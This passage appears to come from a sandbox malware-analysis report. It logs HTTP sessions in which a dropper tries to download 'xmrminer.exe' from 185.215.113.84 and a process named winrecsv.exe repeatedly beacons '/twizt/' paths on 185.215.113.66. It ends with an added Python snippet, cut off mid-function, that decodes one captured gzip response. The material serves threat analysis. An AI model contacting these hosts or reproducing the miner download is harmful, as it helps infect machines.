                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:37.938834906 CEST | 7062 | OUT | GET /twizt/3 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:38.000555992 CEST | 7063 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:37 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:39.964112043 CEST | 7105 | OUT | GET /twizt/4 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:40.021171093 CEST | 7106 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:39 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:41.314265013 CEST | 7106 | OUT | GET /twizt/5 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:41.375215054 CEST | 7107 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:41 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:43.473820925 CEST | 7107 | OUT | GET /twizt/6 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:43.869448900 CEST | 7115 | OUT | GET /twizt/6 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:43.928890944 CEST | 7115 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:43 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                11 | 192.168.2.7 | 49821 | 185.215.113.66 | 80 | C:\Windows\winrecsv.exe
                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                Aug 15, 2022 18:32:47.189857006 CEST | 7267 | OUT | GET /twizt/2 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:47.251492977 CEST | 7268 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:47 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:48.278768063 CEST | 7315 | OUT | GET /twizt/3 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:48.336374044 CEST | 7318 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:48 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:49.350368023 CEST | 7375 | OUT | GET /twizt/4 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:49.407743931 CEST | 7376 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:49 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:50.423707008 CEST | 7558 | OUT | GET /twizt/5 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:50.484554052 CEST | 7559 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:50 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:51.508435011 CEST | 7560 | OUT | GET /twizt/6 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:51.565948963 CEST | 7565 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:51 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                12 | 192.168.2.7 | 49842 | 185.215.113.66 | 80 | C:\Windows\winrecsv.exe
                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                Aug 15, 2022 18:32:54.796464920 CEST | 7774 | OUT | GET /twizt/2 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:54.854403019 CEST | 7775 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:54 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:55.868633032 CEST | 7875 | OUT | GET /twizt/3 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:55.924823999 CEST | 7876 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:55 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:56.930187941 CEST | 7922 | OUT | GET /twizt/4 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:56.986433029 CEST | 7923 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:56 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:57.993880033 CEST | 8032 | OUT | GET /twizt/5 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:58.050360918 CEST | 8033 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:58 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:59.134948015 CEST | 8080 | OUT | GET /twizt/6 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:59.191648960 CEST | 8081 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:59 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                13 | 192.168.2.7 | 49852 | 185.215.113.66 | 80 | C:\Windows\winrecsv.exe
                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                Aug 15, 2022 18:33:03.461499929 CEST | 8171 | OUT | GET /twizt/2 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:33:03.518565893 CEST | 8172 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:33:03 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:33:04.547296047 CEST | 8214 | OUT | GET /twizt/3 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:33:04.604392052 CEST | 8215 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:33:04 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:33:05.621536016 CEST | 8337 | OUT | GET /twizt/4 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:33:05.686567068 CEST | 8339 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:33:05 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:33:06.697235107 CEST | 8381 | OUT | GET /twizt/5 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:33:06.754378080 CEST | 8382 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:33:06 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:33:07.794137955 CEST | 8462 | OUT | GET /twizt/6 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:33:07.851281881 CEST | 8463 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:33:07 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                14 | 192.168.2.7 | 49859 | 185.215.113.66 | 80 | C:\Windows\winrecsv.exe
                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                Aug 15, 2022 18:33:11.077593088 CEST | 8463 | OUT | GET /twizt/2 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:33:11.134056091 CEST | 8464 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:33:11 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:33:12.150340080 CEST | 8471 | OUT | GET /twizt/3 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:33:12.211927891 CEST | 8472 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:33:12 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                2 | 192.168.2.7 | 49765 | 185.215.113.84 | 80 | C:\Users\user\AppData\Local\Temp\509517324.exe
                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                Aug 15, 2022 18:31:38.323205948 CEST | 869 | OUT | GET /xmrminer.exe HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                Host: 185.215.113.84
                                                                                Aug 15, 2022 18:31:38.378837109 CEST | 869 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:38 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                3 | 192.168.2.7 | 49767 | 185.215.113.84 | 80 | C:\Users\user\AppData\Local\Temp\509517324.exe
                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                Aug 15, 2022 18:31:45.186839104 CEST | 887 | OUT | GET /xmrminer.exe HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                Host: 185.215.113.84
                                                                                Connection: Keep-Alive
                                                                                Aug 15, 2022 18:31:45.246023893 CEST | 888 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:45 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 62 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 31 0b c2 30 10 85 77 c1 ff 70 6e 3a a4 69 a1 83 43 c8 22 0a 0e ba 88 3f 20 f5 ce 36 90 5e 24 a6 60 ff bd a9 b6 20 ce 8e 8e f7 ee 7b 8f c7 53 4d 6c 9d 9e cf 54 43 06 b5 8a 36 3a d2 65 5e c2 d1 47 d8 f9 8e 51 c9 b7 a8 e4 0b 49 68 e5 b1 1f 2c 17 e2 48 41 ab a6 f8 76 24 45 c9 f1 3d 64 27 68 bc b8 b6 fc 90 45 56 ac b3 1c 96 e7 aa e3 d8 ad 3e 59 39 a5 cb a9 d9 42 08 30 70 33 88 96 6b 88 1e d0 de 4d e5 08 0e a7 fd 16 0c 23 6c 9a e0 5b 82 6b b0 c4 e8 7a a0 10 7c 48 8e 9a 40 88 a1 e9 3f e2 97 5b 3c 01 2a b6 49 35 34 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: ba10wpn:iC"? 6^$` {SMlTC6:e^GQIh,HAv$E=d'hEV>Y9B0p3kM#l[kz|H@?[<*I540
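The session 3 response above is both chunked (Transfer-Encoding: chunked) and compressed (Content-Encoding: gzip), so its "Data Ascii" rendering is only the raw deflate bytes and says nothing about what the dropper actually received. The following is an added example and not part of the Joe Sandbox report: it de-chunks and gunzips exactly the "Data Raw" bytes listed above, using only the Python standard library, so the body can be compared with the uncompressed 404 pages that 185.215.113.66 returns in the later sessions. The chunk-size line is "ba" (186 bytes), the trailer "0\r\n\r\n" is the zero-length final chunk, and the last eight bytes of the gzip member (2a b6 49 35 34 02 00 00) carry the CRC32 and the uncompressed size, 0x234 = 564 bytes.

```python
"""Decode the chunked, gzip-encoded 404 body captured in session 3 of the report."""
import gzip
import struct
import zlib
from typing import Tuple

# Response body exactly as listed under "Data Raw" above: chunk-size line,
# one 0xba-byte chunk holding a gzip member, then the terminating zero chunk.
RAW_HEX = (
    "62 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 31 0b c2 30 "
    "10 85 77 c1 ff 70 6e 3a a4 69 a1 83 43 c8 22 0a 0e ba 88 3f "
    "20 f5 ce 36 90 5e 24 a6 60 ff bd a9 b6 20 ce 8e 8e f7 ee 7b "
    "8f c7 53 4d 6c 9d 9e cf 54 43 06 b5 8a 36 3a d2 65 5e c2 d1 "
    "47 d8 f9 8e 51 c9 b7 a8 e4 0b 49 68 e5 b1 1f 2c 17 e2 48 41 "
    "ab a6 f8 76 24 45 c9 f1 3d 64 27 68 bc b8 b6 fc 90 45 56 ac "
    "b3 1c 96 e7 aa e3 d8 ad 3e 59 39 a5 cb a9 d9 42 08 30 70 33 "
    "88 96 6b 88 1e d0 de 4d e5 08 0e a7 fd 16 0c 23 6c 9a e0 5b "
    "82 6b b0 c4 e8 7a a0 10 7c 48 8e 9a 40 88 a1 e9 3f e2 97 5b "
    "3c 01 2a b6 49 35 34 02 00 00 0d 0a 30 0d 0a 0d 0a"
)
RAW = bytes.fromhex(RAW_HEX)


def dechunk(body: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked transfer-coding body (RFC 9112 section 7.1).

    Each chunk is '<hex-size>[;extensions]\\r\\n<data>\\r\\n'; a zero-size chunk
    ends the body and is followed by optional trailer fields and a final CRLF.
    """
    out = bytearray()
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)
        pos = eol + 2
        if size == 0:
            return bytes(out)                       # trailers, if any, are ignored
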